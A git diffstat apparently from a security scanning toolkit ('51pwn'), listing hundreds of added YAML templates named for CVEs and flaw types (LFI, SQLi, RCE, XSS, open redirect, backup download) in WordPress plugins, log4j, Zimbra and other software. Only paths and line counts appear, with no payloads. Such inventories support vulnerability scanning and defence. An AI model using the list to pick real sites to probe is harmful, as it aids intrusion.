.../51pwn/yaml/WordPress/CVE-2015-4018.yaml | 39 + .../51pwn/yaml/WordPress/CVE-2015-4133.yaml | 58 + .../51pwn/yaml/WordPress/CVE-2015-4414.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2015-4694.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2015-5461.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2015-5471.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2015-5472.yaml | 31 + .../51pwn/yaml/WordPress/CVE-2015-6920.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2015-7377.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2015-7517.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2015-9406.yaml | 30 + .../51pwn/yaml/WordPress/CVE-2015-9414.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2015-9480.yaml | 50 + .../yaml/WordPress/CVE-2016-1000126.yaml | 52 + .../yaml/WordPress/CVE-2016-1000127.yaml | 52 + .../yaml/WordPress/CVE-2016-1000128.yaml | 51 + .../yaml/WordPress/CVE-2016-1000129.yaml | 52 + .../yaml/WordPress/CVE-2016-1000130.yaml | 53 + .../yaml/WordPress/CVE-2016-1000131.yaml | 53 + .../yaml/WordPress/CVE-2016-1000132.yaml | 52 + .../yaml/WordPress/CVE-2016-1000133.yaml | 52 + .../yaml/WordPress/CVE-2016-1000134.yaml | 53 + .../yaml/WordPress/CVE-2016-1000135.yaml | 53 + .../yaml/WordPress/CVE-2016-1000136.yaml | 51 + .../yaml/WordPress/CVE-2016-1000137.yaml | 52 + .../yaml/WordPress/CVE-2016-1000138.yaml | 51 + .../yaml/WordPress/CVE-2016-1000139.yaml | 54 + .../yaml/WordPress/CVE-2016-1000140.yaml | 52 + .../yaml/WordPress/CVE-2016-1000141.yaml | 51 + .../yaml/WordPress/CVE-2016-1000142.yaml | 53 + .../yaml/WordPress/CVE-2016-1000143.yaml | 51 + .../yaml/WordPress/CVE-2016-1000146.yaml | 53 + .../yaml/WordPress/CVE-2016-1000148.yaml | 53 + .../yaml/WordPress/CVE-2016-1000149.yaml | 52 + .../yaml/WordPress/CVE-2016-1000152.yaml | 52 + .../yaml/WordPress/CVE-2016-1000153.yaml | 52 + .../yaml/WordPress/CVE-2016-1000154.yaml | 52 + .../yaml/WordPress/CVE-2016-1000155.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2016-10904.yaml | 35 + .../51pwn/yaml/WordPress/CVE-2016-10924.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2016-10940.yaml | 70 + .../51pwn/yaml/WordPress/CVE-2016-10956.yaml | 54 + .../51pwn/yaml/WordPress/CVE-2016-10960.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2016-10981.yaml | 32 + .../51pwn/yaml/WordPress/CVE-2016-10983.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2016-10991.yaml | 35 + .../51pwn/yaml/WordPress/CVE-2016-10993.yaml | 51 + .../yaml/WordPress/CVE-2017-1000170.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2017-17043.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2017-17058.yaml | 26 + .../51pwn/yaml/WordPress/CVE-2017-17059.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2017-17451.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2017-18536.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2017-18553.yaml | 30 + .../51pwn/yaml/WordPress/CVE-2017-18598.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2017-5487.yaml | 56 + .../51pwn/yaml/WordPress/CVE-2017-7719.yaml | 37 + .../51pwn/yaml/WordPress/CVE-2017-9288.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2018-10969.yaml | 40 + .../51pwn/yaml/WordPress/CVE-2018-11709.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2018-16283.yaml | 43 + .../51pwn/yaml/WordPress/CVE-2018-16299.yaml | 46 + .../51pwn/yaml/WordPress/CVE-2018-17074.yaml | 31 + .../51pwn/yaml/WordPress/CVE-2018-18069.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2018-20462.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2018-20985.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2018-3810.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2018-5316.yaml | 60 + .../51pwn/yaml/WordPress/CVE-2018-5651.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2018-7422.yaml | 57 + .../51pwn/yaml/WordPress/CVE-2018-8719.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2018-9118.yaml | 50 + .../51pwn/yaml/WordPress/CVE-2019-11869.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2019-14205.yaml | 54 + .../51pwn/yaml/WordPress/CVE-2019-14470.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2019-15713.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2019-15858.yaml | 57 + .../51pwn/yaml/WordPress/CVE-2019-15889.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2019-16332.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2019-16525.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2019-16931.yaml | 58 + .../51pwn/yaml/WordPress/CVE-2019-16932.yaml | 62 + .../51pwn/yaml/WordPress/CVE-2019-19134.yaml | 54 + .../51pwn/yaml/WordPress/CVE-2019-19985.yaml | 59 + .../51pwn/yaml/WordPress/CVE-2019-20141.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2019-6112.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2019-6715.yaml | 43 + .../51pwn/yaml/WordPress/CVE-2019-9618.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2019-9978.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2020-11738.yaml | 56 + .../51pwn/yaml/WordPress/CVE-2020-11930.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2020-12054.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2020-12800.yaml | 78 + .../51pwn/yaml/WordPress/CVE-2020-13700.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2020-14092.yaml | 54 + .../51pwn/yaml/WordPress/CVE-2020-17362.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2020-24148.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2020-24186.yaml | 97 + .../51pwn/yaml/WordPress/CVE-2020-24312.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2020-25213.yaml | 75 + .../51pwn/yaml/WordPress/CVE-2020-26153.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2020-26876.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2020-28976.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2020-29395.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2020-35234.yaml | 27 + .../51pwn/yaml/WordPress/CVE-2020-35489.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2020-35749.yaml | 43 + .../51pwn/yaml/WordPress/CVE-2020-35951.yaml | 60 + .../51pwn/yaml/WordPress/CVE-2020-36510.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2020-8771.yaml | 67 + .../51pwn/yaml/WordPress/CVE-2021-20792.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-21389.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2021-24146.yaml | 30 + .../51pwn/yaml/WordPress/CVE-2021-24176.yaml | 30 + .../51pwn/yaml/WordPress/CVE-2021-24210.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2021-24226.yaml | 29 + .../51pwn/yaml/WordPress/CVE-2021-24235.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2021-24237.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2021-24274.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24275.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24276.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24278.yaml | 39 + .../51pwn/yaml/WordPress/CVE-2021-24285.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2021-24288.yaml | 29 + .../51pwn/yaml/WordPress/CVE-2021-24291.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2021-24298.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24300.yaml | 46 + .../51pwn/yaml/WordPress/CVE-2021-24316.yaml | 37 + .../51pwn/yaml/WordPress/CVE-2021-24320.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24335.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24340.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2021-24342.yaml | 40 + .../51pwn/yaml/WordPress/CVE-2021-24358.yaml | 50 + .../51pwn/yaml/WordPress/CVE-2021-24364.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2021-24387.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2021-24389.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-24406.yaml | 29 + .../51pwn/yaml/WordPress/CVE-2021-24407.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2021-24472.yaml | 37 + .../51pwn/yaml/WordPress/CVE-2021-24488.yaml | 42 + .../51pwn/yaml/WordPress/CVE-2021-24495.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2021-24498.yaml | 41 + .../51pwn/yaml/WordPress/CVE-2021-24499.yaml | 59 + .../51pwn/yaml/WordPress/CVE-2021-24510.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-24746.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2021-24750.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2021-24762.yaml | 37 + .../51pwn/yaml/WordPress/CVE-2021-24838.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2021-24926.yaml | 42 + .../51pwn/yaml/WordPress/CVE-2021-24947.yaml | 42 + .../51pwn/yaml/WordPress/CVE-2021-24991.yaml | 43 + .../51pwn/yaml/WordPress/CVE-2021-24997.yaml | 35 + .../51pwn/yaml/WordPress/CVE-2021-25008.yaml | 42 + .../51pwn/yaml/WordPress/CVE-2021-25028.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2021-25033.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2021-25052.yaml | 43 + .../51pwn/yaml/WordPress/CVE-2021-25055.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-25063.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-25074.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2021-25075.yaml | 55 + .../51pwn/yaml/WordPress/CVE-2021-25111.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2021-25112.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-25118.yaml | 57 + .../51pwn/yaml/WordPress/CVE-2021-25120.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-34621.yaml | 102 + .../51pwn/yaml/WordPress/CVE-2021-34640.yaml | 62 + .../51pwn/yaml/WordPress/CVE-2021-34643.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-38314.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2021-39312.yaml | 58 + .../51pwn/yaml/WordPress/CVE-2021-39316.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2021-39320.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2021-39322.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2021-39327.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2021-39350.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2022-0140.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2022-0148.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2022-0149.yaml | 45 + .../51pwn/yaml/WordPress/CVE-2022-0165.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2022-0189.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2022-0201.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2022-0208.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2022-0218.yaml | 37 + .../51pwn/yaml/WordPress/CVE-2022-0271.yaml | 35 + .../51pwn/yaml/WordPress/CVE-2022-0288.yaml | 40 + .../51pwn/yaml/WordPress/CVE-2022-0346.yaml | 41 + .../51pwn/yaml/WordPress/CVE-2022-0381.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2022-0422.yaml | 42 + .../51pwn/yaml/WordPress/CVE-2022-0591.yaml | 30 + .../51pwn/yaml/WordPress/CVE-2022-0595.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2022-0653.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2022-1020.yaml | 39 + .../51pwn/yaml/WordPress/CVE-2022-1054.yaml | 31 + .../51pwn/yaml/WordPress/CVE-2022-1119.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2022-1221.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2022-1392.yaml | 50 + .../51pwn/yaml/WordPress/CVE-2022-1597.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2022-27849.yaml | 34 + .../WordPress-Abtest_Plugin-LFI.yaml | 33 + ...s-Ad_Buttons_Plugins-DatabaseDownload.yaml | 26 + ...Locator_Wordpress_Plugins-FileInclude.yaml | 33 + ...-Ari_Adminer_Plugins-DatabaseDownlaod.yaml | 37 + ...ss-BatchMove_Plugins-DatabaseDownload.yaml | 37 + .../WordPress-Begin_Themes-Redirection.yaml | 32 + .../WordPress/WordPress-Brandfolder-LFI.yaml | 33 + ...aldera_Forms_Plugins-DatabaseDownload.yaml | 37 + ...rdPress-Community_Events_Plugins-SQLi.yaml | 43 + ...cks_SypexGeo_Plugins-DatabaseDownload.yaml | 37 + ...m_Management_Plugins-DatabaseDownload.yaml | 37 + ...mment_System_Plugins-DatabaseDownload.yaml | 39 + ..._and_Reports_Plugins-DatabaseDownload.yaml | 36 + ..._Wordpress_Plugins-FullPathDisclosure.yaml | 37 + ...ress-Toolbox_Plugins-DatabaseDownload.yaml | 37 + ...ss-wppg_photo_details_gallery_id-SQLi.yaml | 38 + .../Wordpress-497-InfoDisclosure.yaml | 35 + .../Wordpress-4_7-InfoDisclosure.yaml | 34 + ...dpress-4_7_3_revslider-InfoDisclosure.yaml | 34 + .../Wordpress-4_9_x_u_parts-FileRead.yaml | 30 + .../Wordpress-53-UserDisclosure.yaml | 35 + ...pptha_Slider_Gallery_Plugins-FileRead.yaml | 32 + .../Wordpress-AzonPop_Plugin-SQLi.yaml | 33 + .../yaml/WordPress/Wordpress-CIP4-LFI.yaml | 30 + ...s-Cp_Multi_View_Calendar_Plugins-SQLi.yaml | 33 + .../Wordpress-Diarise_Plugins-LFI.yaml | 23 + ...trutura-Basica_Plugins-FileDisclosure.yaml | 30 + .../Wordpress-FAQ_Plugins-DirectoryCross.yaml | 25 + ...-Fusion_Engage_Plugins-FileDisclosure.yaml | 33 + ...ghStand_Themes-DatabaseBackupDownload.yaml | 37 + .../Wordpress-IP-Logger_Plugins-SQLi.yaml | 33 + ...redibleWP_Theme-ArbitraryFileDownload.yaml | 33 + .../Wordpress-Issuu_Panelr_Plugins-LFI.yaml | 32 + ...Amazon_WP-S3_Plugins-DatabaseDownload.yaml | 37 + ...king_Plugins-DatabaseBackupDisclosure.yaml | 37 + .../Wordpress-KBoard_Plugins-SQLi.yaml | 36 + ...bers_Plugins-DatabaseBackupDisclosure.yaml | 39 + .../Wordpress-Mail_Masta_Plugins-LFI.yaml | 35 + .../Wordpress-MainWP_Plugins-BypassLogin.yaml | 48 + ...Media_Library_Categories_Plugins-SQLi.yaml | 36 + ...MiwoFTP_Plugins-ArbitraryFileDownload.yaml | 30 + ...Multiple_Themes-ArbitraryFileDownload.yaml | 57 + ...edia_Website_Contact_Form-FileInclude.yaml | 31 + ...ress-OPS_Old_Post_Spinner_Plugins-LFI.yaml | 30 + ...dpress-Orbis_Plugins-DatabaseDownload.yaml | 34 + ...Pagelines_Plugins-ArbitraryFileUpload.yaml | 47 + .../Wordpress-Photocart_Link_Plugins-LFI.yaml | 30 + .../WordPress/Wordpress-Plugin_404-XSS.yaml | 28 + .../WordPress/Wordpress-Private-InfoLeak.yaml | 33 + ...ordpress-Product_Catalog_Plugins-SQLi.yaml | 35 + ...edSteel_Themes-ArbitraryFilesDownload.yaml | 30 + ..._Image_Plugins-ArbitraryFilesDownload.yaml | 30 + .../Wordpress-Seo_Pressor-LeakAge.yaml | 25 + ...-Shopp_Plugins-DatabaseBackupDownload.yaml | 34 + ...Simple_Forum_Plugins-DatabaseDownload.yaml | 34 + .../Wordpress-Social_Warfare_Plugins-RCE.yaml | 32 + ...rdpress-Ultimatum_Themes-FileDownload.yaml | 30 + .../WordPress/Wordpress-W3tc-InfoLeak.yaml | 34 + ...dpress-WP_BackupPlus_Plugins-InfoLeak.yaml | 34 + ...ectory_Plugins-DatabaseBackupDownload.yaml | 34 + ...-WP_EasyCart_Plugins-DatabaseDownload.yaml | 36 + ...ss-WP_Mobile_Edition_Plugins-FileRead.yaml | 30 + ...Quiz_Plugins-DatabaseBackupDisclosure.yaml | 33 + ...ss-WPide_ACE_Plugins-DatabaseDownload.yaml | 34 + ...one_Photo_Uploader_Plugins-FileUpload.yaml | 71 + ...urStoreFront_Plugins-DatabaseDownload.yaml | 34 + ...tters_Plugins-DatabaseBackuDisclosure.yaml | 36 + .../Wordpress-db-backup-InfoDisclosure.yaml | 34 + ...s-force_download_Plugins-FileDownload.yaml | 39 + .../WordPress/Wordpress-jQuery-DomXSS.yaml | 29 + ...ordpress-jQuery_Mega_Menu_Plugins-LFI.yaml | 30 + ...ewwpml_Plugins-DatabaseBackupDownload.yaml | 37 + .../Wordpress-setupconfig-InfoDisclosure.yaml | 34 + ...ordpress-submit_nex_form_Plugins-SQLi.yaml | 35 + ...ordpress-wp_admin_admin_ajax-FileRead.yaml | 30 + .../WordPress/accessibility-helper-xss.yaml | 39 + .../51pwn/yaml/WordPress/ad-widget-lfi.yaml | 38 + .../admin-word-count-column-lfi.yaml | 39 + .../advanced-access-manager-lfi.yaml | 43 + .../WordPress/age-gate-open-redirect.yaml | 42 + .../WordPress/ait-csv-import-export-rce.yaml | 55 + .../yaml/WordPress/alfacgiapi-wordpress.yaml | 41 + .../WordPress/amministrazione-aperta-lfi.yaml | 39 + .../yaml/WordPress/aspose-file-download.yaml | 42 + .../WordPress/aspose-ie-file-download.yaml | 42 + .../WordPress/aspose-pdf-file-download.yaml | 42 + .../WordPress/aspose-words-file-download.yaml | 43 + .../attitude-theme-open-redirect.yaml | 33 + config/51pwn/yaml/WordPress/avada-xss.yaml | 43 + .../51pwn/yaml/WordPress/brandfolder-lfi.yaml | 42 + .../WordPress/brandfolder-open-redirect.yaml | 33 + .../WordPress/cab-fare-calculator-lfi.yaml | 39 + .../WordPress/candidate-application-lfi.yaml | 43 + .../yaml/WordPress/cherry-file-download.yaml | 46 + .../yaml/WordPress/church-admin-lfi.yaml | 33 + .../51pwn/yaml/WordPress/churchope-lfi.yaml | 44 + .../51pwn/yaml/WordPress/db-backup-lfi.yaml | 44 + .../yaml/WordPress/diarise-theme-lfi.yaml | 33 + .../eatery-restaurant-open-redirect.yaml | 28 + .../yaml/WordPress/elex-woocommerce-xss.yaml | 57 + .../yaml/WordPress/feedwordpress-xss.yaml | 44 + .../flow-flow-social-stream-xss.yaml | 36 + config/51pwn/yaml/WordPress/hb-audio-lfi.yaml | 36 + .../yaml/WordPress/health-check-lfi.yaml | 50 + .../WordPress/hide-security-enhancer-lfi.yaml | 36 + .../51pwn/yaml/WordPress/issuu-panel-lfi.yaml | 33 + .../51pwn/yaml/WordPress/mthemeunus-lfi.yaml | 36 + .../WordPress/music-store-open-redirect.yaml | 30 + .../51pwn/yaml/WordPress/my-chatbot-xss.yaml | 44 + .../WordPress/nativechurch-wp-theme-lfd.yaml | 35 + .../newsletter-manager-open-redirect.yaml | 28 + .../WordPress/ninjaform-open-redirect.yaml | 41 + .../WordPress/pieregister-open-redirect.yaml | 28 + .../WordPress/sassy-social-share-xss.yaml | 38 + .../yaml/WordPress/seo-redirection-xss.yaml | 53 + .../51pwn/yaml/WordPress/shortcode-lfi.yaml | 46 + .../simple-image-manipulator-lfi.yaml | 33 + config/51pwn/yaml/WordPress/sniplets-lfi.yaml | 36 + config/51pwn/yaml/WordPress/sniplets-xss.yaml | 28 + .../ultimatemember-open-redirect.yaml | 28 + .../yaml/WordPress/video-synchro-pdf-lfi.yaml | 33 + .../yaml/WordPress/w3c-total-cache-ssrf.yaml | 30 + .../weekender-newspaper-open-redirect.yaml | 28 + .../wordpress-accessible-wpconfig.yaml | 55 + .../WordPress/wordpress-affiliatewp-log.yaml | 42 + .../wordpress-db-backup-listing.yaml | 30 + .../yaml/WordPress/wordpress-db-backup.yaml | 32 + .../yaml/WordPress/wordpress-db-repair.yaml | 40 + .../wordpress-directory-listing.yaml | 29 + .../yaml/WordPress/wordpress-git-config.yaml | 42 + .../wordpress-infinitewp-auth-bypass.yaml | 66 + .../wordpress-rce-simplefilelist.yaml | 80 + .../wordpress-social-metrics-tracker.yaml | 36 + .../yaml/WordPress/wordpress-ssrf-oembed.yaml | 38 + ...ordpress-total-upkeep-backup-download.yaml | 44 + .../yaml/WordPress/wordpress-upload-data.yaml | 36 + .../WordPress/wordpress-woocommerce-sqli.yaml | 45 + .../WordPress/wordpress-wordfence-lfi.yaml | 33 + .../wordpress-wordfence-waf-bypass-xss.yaml | 34 + .../WordPress/wordpress-wordfence-xss.yaml | 35 + .../wordpress-xmlrpc-brute-force.yaml | 59 + .../WordPress/wordpress-zebra-form-xss.yaml | 44 + .../51pwn/yaml/WordPress/wp-adaptive-xss.yaml | 35 + .../51pwn/yaml/WordPress/wp-ambience-xss.yaml | 29 + .../yaml/WordPress/wp-church-admin-xss.yaml | 33 + .../51pwn/yaml/WordPress/wp-config-setup.yaml | 31 + .../yaml/WordPress/wp-custom-tables-xss.yaml | 34 + config/51pwn/yaml/WordPress/wp-debug-log.yaml | 43 + .../51pwn/yaml/WordPress/wp-finder-xss.yaml | 34 + .../51pwn/yaml/WordPress/wp-flagem-xss.yaml | 34 + .../WordPress/wp-grimag-open-redirect.yaml | 28 + .../wp-gtranslate-open-redirect.yaml | 31 + config/51pwn/yaml/WordPress/wp-install.yaml | 35 + .../51pwn/yaml/WordPress/wp-javospot-lfi.yaml | 36 + config/51pwn/yaml/WordPress/wp-knews-xss.yaml | 35 + .../wp-memphis-documents-library-lfi.yaml | 37 + .../WordPress/wp-multiple-theme-ssrf.yaml | 46 + .../51pwn/yaml/WordPress/wp-nextgen-xss.yaml | 34 + .../yaml/WordPress/wp-oxygen-theme-lfi.yaml | 36 + .../yaml/WordPress/wp-phpfreechat-xss.yaml | 34 + .../WordPress/wp-prostore-open-redirect.yaml | 28 + .../WordPress/wp-revslider-file-download.yaml | 38 + .../yaml/WordPress/wp-securimage-xss.yaml | 35 + .../WordPress/wp-security-open-redirect.yaml | 29 + .../yaml/WordPress/wp-simple-fields-lfi.yaml | 30 + .../yaml/WordPress/wp-slideshow-xss.yaml | 34 + .../yaml/WordPress/wp-socialfit-xss.yaml | 29 + .../yaml/WordPress/wp-spot-premium-lfi.yaml | 36 + .../51pwn/yaml/WordPress/wp-tinymce-lfi.yaml | 36 + config/51pwn/yaml/WordPress/wp-tutor-lfi.yaml | 36 + .../WordPress/wp-under-construction-ssrf.yaml | 37 + .../wp-vault-local-file-inclusion.yaml | 33 + .../wp-woocommerce-email-verification.yaml | 44 + .../wp-woocommerce-file-download.yaml | 48 + .../wp-woocommerce-pdf-invoice-listing.yaml | 40 + .../yaml/WordPress/wpconfig-aws-keys.yaml | 39 + .../yaml/WordPress/wpdm-cache-session.yaml | 36 + .../yaml/WordPress/wpmudev-pub-keys.yaml | 36 + .../yaml/WordPress/wptouch-open-redirect.yaml | 28 + .../CVE-2018-19365.yaml | 46 + config/51pwn/yaml/Wuzhicms/wuzhicms-sqli.yaml | 44 + config/51pwn/yaml/XDCMS/xdcms-sqli.yaml | 51 + config/51pwn/yaml/XWork/CVE-2010-1870.yaml | 21 + .../yaml/XenMobile Server/CVE-2020-8209.yaml | 33 + .../Xiaomi Mi WiFi R3G/CVE-2019-18371.yaml | 46 + config/51pwn/yaml/Xibo/CVE-2013-5979.yaml | 27 + .../51pwn/yaml/Xiuno BBS/CNVD-2019-01348.yaml | 47 + config/51pwn/yaml/YAPI/yapi-rce.yaml | 95 + .../yaml/Yachtcontrol/CVE-2019-17270.yaml | 51 + config/51pwn/yaml/Yaws/CVE-2017-10974.yaml | 45 + .../CVE-2021-27561.yaml | 62 + config/51pwn/yaml/Yii/CVE-2020-15148.yaml | 45 + .../51pwn/yaml/YouPHPTube/CVE-2019-5127.yaml | 61 + .../51pwn/yaml/YunGouCMS/yungoucms-sqli.yaml | 39 + .../51pwn/yaml/Z-BlogPHP/CVE-2020-18268.yaml | 59 + config/51pwn/yaml/ZCMS/zcms-v3-sqli.yaml | 42 + .../yaml/ZEIT Next.js/CVE-2017-16877.yaml | 46 + .../yaml/ZEIT Next.js/CVE-2020-5284.yaml | 46 + .../CVE-2015-7780.yaml | 33 + .../CVE-2020-12116.yaml | 50 + .../CVE-2017-11512.yaml | 33 + .../CVE-2014-2321.yaml" | 33 + config/51pwn/yaml/ZZZPHP/CVE-2019-9041.yaml | 37 + config/51pwn/yaml/ZZZPHP/CVE-2022-23881.yaml | 35 + config/51pwn/yaml/Zarafa/CVE-2019-7219.yaml | 48 + .../51pwn/yaml/ZeroShell/CVE-2009-0545.yaml | 24 + .../51pwn/yaml/ZeroShell/CVE-2019-12725.yaml | 33 + .../CVE-2018-13980.yaml | 41 + .../CVE-2013-7091.yaml | 43 + .../CVE-2018-14013.yaml | 35 + .../CVE-2019-9670.yaml | 46 + .../CVE-2020-7796.yaml | 32 + .../CVE-2022-37042.yaml | 54 + .../zimbra-preauth-ssrf.yaml | 33 + .../CVE-2021-37416.yaml | 37 + .../CVE-2021-40539.yaml | 103 + .../CVE-2019-9955.yaml" | 29 + .../CVE-2020-9054.yaml" | 25 + .../CVE-2018-19326.yaml" | 36 + .../CVE-2021-3297.yaml" | 32 + .../ahwebexperts-car-details-sqli.yaml | 44 + .../ahwebexperts-pagephp-sqli.yaml | 44 + .../ahwebexperts-product-sqli.yaml | 44 + .../yaml/arcms/Arcms-json_newslist-sqli.yaml | 33 + .../51pwn/yaml/arcms/CNVD-2018-26783_1.yaml | 32 + .../yaml/arcms/bartarcms-allgallary-sqli.yaml | 35 + config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml | 42 + .../yaml/aspcms/Aspcms-Backend-Leak.yaml | 51 + .../yaml/aspcms/wooyun-2015-0161677.yaml | 27 + .../yaml/b2evolution/CVE-2020-22840.yaml | 25 + .../bootcms/Bootcms_v1-goodsids-sqli.yaml | 37 + .../bootcms/Bootcms_v1-homepage-sqli.yaml | 34 + .../btoptionscom/btoptionscom-bnb-sqli.yaml | 35 + .../btoptionscom-financial-sqli.yaml | 35 + .../btoptionscom-financial_times-xss.yaml | 36 + .../btoptionscom-hbr_php-sqli.yaml | 35 + .../btoptionscom-newspack-sqli.yaml | 35 + .../CVE-2021-33807.yaml | 50 + .../yaml/cobubrazor/CNVD-2018-06472-1.yaml | 38 + .../yaml/cobubrazor/CNVD-2018-06472.yaml | 36 + .../Ccobubrazor_v8-generate-info.yaml | 35 + .../Ccobubrazor_v8-getConfigTest-info.yaml | 35 + .../cobubrazor_v8-Controller_fixt-info.yaml | 36 + .../cobubrazor_v8-Controller_fixt2-info.yaml | 36 + .../cobubrazor_v8-commonDbfix-info.yaml | 36 + .../cobubrazor_v8-getUpdateTest-info.yaml | 36 + .../cobubrazor/cobubrazor_v8-ipTest-info.yaml | 36 + ...cobubrazor_v8-postclientdataTest-info.yaml | 36 + .../cobubrazor_v8-posterrorTest-info.yaml | 36 + .../cobubrazor_v8-posteventTest-info.yaml | 36 + .../cobubrazor_v8-posttagTest-info.yaml | 36 + .../cobubrazor_v8-postusinglogTest-info.yaml | 36 + .../cobubrazor_v8-view_fixt2-info.yaml | 36 + config/51pwn/yaml/dompdf/CVE-2014-2383.yaml | 41 + config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml | 35 + .../yaml/e-mobile/E_mobile-sqli-flowimg.yaml | 42 + .../yaml/e-mobile/wooyun-2015-0126024_2.yaml | 40 + config/51pwn/yaml/emlog/CVE-2021-3293.yaml | 34 + ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + .../51pwn/yaml/exacqVision/CVE-2020-9047.yaml | 78 + .../51pwn/yaml/feifeicms/feifeicms-lfr.yaml | 45 + .../51pwn/yaml/flexpapar/CVE-2018-11686.yaml | 39 + config/51pwn/yaml/flink/CVE-2020-17518.yaml | 39 + config/51pwn/yaml/flink/CVE-2020-17519.yaml | 35 + .../yaml/flink/apache-flink-unauth-rce.yaml | 57 + config/51pwn/yaml/frp/frp-default-login.yaml | 45 + .../51pwn/yaml/frp/unauthenticated-frp.yaml | 32 + .../Qilin-Bastion-HostRce.yaml" | 34 + .../yaml/iPECS NMS 30M/CVE-2018-15138.yaml | 36 + config/51pwn/yaml/ifw8/CVE-2019-16313.yaml | 45 + config/51pwn/yaml/jeewms/jeewms-lfi.yaml | 42 + config/51pwn/yaml/jitsi/CVE-2021-26812.yaml | 52 + config/51pwn/yaml/jnoj/CVE-2019-17538.yaml | 50 + .../CVE-2018-1000533.yaml | 59 + config/51pwn/yaml/kylin/CVE-2020-13937.yaml | 38 + config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml | 26 + config/51pwn/yaml/log4j/CVE-2021-44228.yaml | 77 + config/51pwn/yaml/log4j/CVE-2021-45046.yaml | 57 + 